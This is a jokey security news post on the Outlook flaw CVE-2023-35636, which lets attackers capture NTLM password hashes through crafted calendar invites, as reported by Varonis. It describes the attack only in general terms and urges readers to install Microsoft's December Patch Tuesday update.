Outlook Flaw Exposed: Hashed Passwords Up for Grabs, Patch Now to Seal the Leak!

Outlook’s got a leaky faucet, dripping passwords like a bad secret-keeper. Patch Tuesday’s plugging it up, so update before hackers tap in! #PatchTuesdayLeaks

Hot Take:

Oh, the weather outside is frightful, but hackers find vulnerabilities so delightful. And since we’ve got no place to go, patch it fast, patch it fast, patch it fast! Microsoft’s December Patch Tuesday was like an early Christmas gift for cybersecurity, wrapping up that nasty Outlook flaw with a pretty bow. But, like that one relative who always finds something to complain about, researchers say there’s more to fix. Let’s dive into the hacker’s stocking of tricks, shall we?

Key Points:

  • Microsoft’s December Patch Tuesday is like the bouncer at the club, turning away shady characters—this time, it’s blocking a vulnerability in Outlook that lets hackers steal your password hash.
  • Varonis researchers are the new neighborhood watch, spotting a bug in Outlook’s calendar invites that could serve as a hacker’s RSVP to your data.
  • Using the Responder.py tool, cyber crooks can eavesdrop on your Outlook invites, snagging password hashes like they’re catching bridal bouquets.
  • With a severity score of 6.5, CVE-2023-35636 is the awkward middle child—not the most dangerous, but definitely not to be ignored.
  • Microsoft patched up one way in, but researchers still see potential backdoors, like the Windows Performance Analyzer, that need some deadbolts.
Cve id: CVE-2023-35636
Cve state: PUBLISHED
Cve assigner short name: microsoft
Cve date updated: 12/15/2023
Cve description: Microsoft Outlook Information Disclosure Vulnerability

Need to know more?

Outlook's Uninvited Plus-One

So, the cybersecurity equivalent of Sherlock and Watson at Varonis have unearthed a digital party crasher in the form of a bug nestled in Outlook's calendar sharing system. This isn't your typical "forgot to BCC" faux pas; it's a crafty scheme where hackers whip up a custom file, slip it into an email invite, and wait for you to RSVP 'Yes' to their hash-stealing soiree. Imagine sending out party details only to have bandits show up instead of your friends, and you've got the picture.

Listening with Intent to Pilfer

Now, these hackers aren't just eavesdropping; they're setting up a full-on surveillance system with tools like Responder.py, which is basically the wiretap of SMB and NTLM hash attacks. They're out there, lurking in the shadows, listening for the sweet sounds of your password hashes, ready to turn them into the passkey to your digital kingdom. It's like having someone listen in on your phone call, but instead of gossip, they're after your credentials.

Click Bait-and-Switch

And if you thought staying off email would keep you safe, think again. Microsoft warns that web-based attacks are also on the menu. Hackers can set up a malicious website or hijack a legitimate one to serve you a special file that's like a digital trojan horse, waiting to exploit the vulnerability. All it takes is a convincing email and a curious click, and you're on the express train to Hacksville.

The Patch Is Just the Start

Microsoft might have patched the flaw, but it's like plugging a leak with chewing gum—it might hold for now, but there's more work to be done. The researchers have their eyes on other potential weak spots, like the Windows Performance Analyzer and File Explorer. These could be the equivalent of leaving your windows open when you've got the front door locked—a rookie mistake in the cybersecurity neighborhood watch handbook.

Hashing It Out Over the Internet

What's particularly intriguing, or terrifying depending on how you look at it, is that the Windows Performance Analyzer tries to authenticate with NTLM v2 over the internet. That's a bit like sending a secret message via a postcard—your information is out there for anyone with the right tools to see. And in the digital realm, that means your NTLM v2 hash is ripe for the picking by anyone skilled in the dark arts of relay and brute-force attacks.

Bottom line? The cyber Grinches are always looking for ways to steal your Christmas, or at least your data. So, while you're sipping that eggnog and decking the halls, make sure you've also decked your system with the latest patches. It's the cybersecurity equivalent of locking your doors and installing a high-tech alarm system—because nobody wants their digital goodies swiped by a cyber Scrooge.

Tags: CVE-2023-35636, , hashed passwords, Microsoft Outlook, NTLM Hash, Patch Tuesday, phishing attacks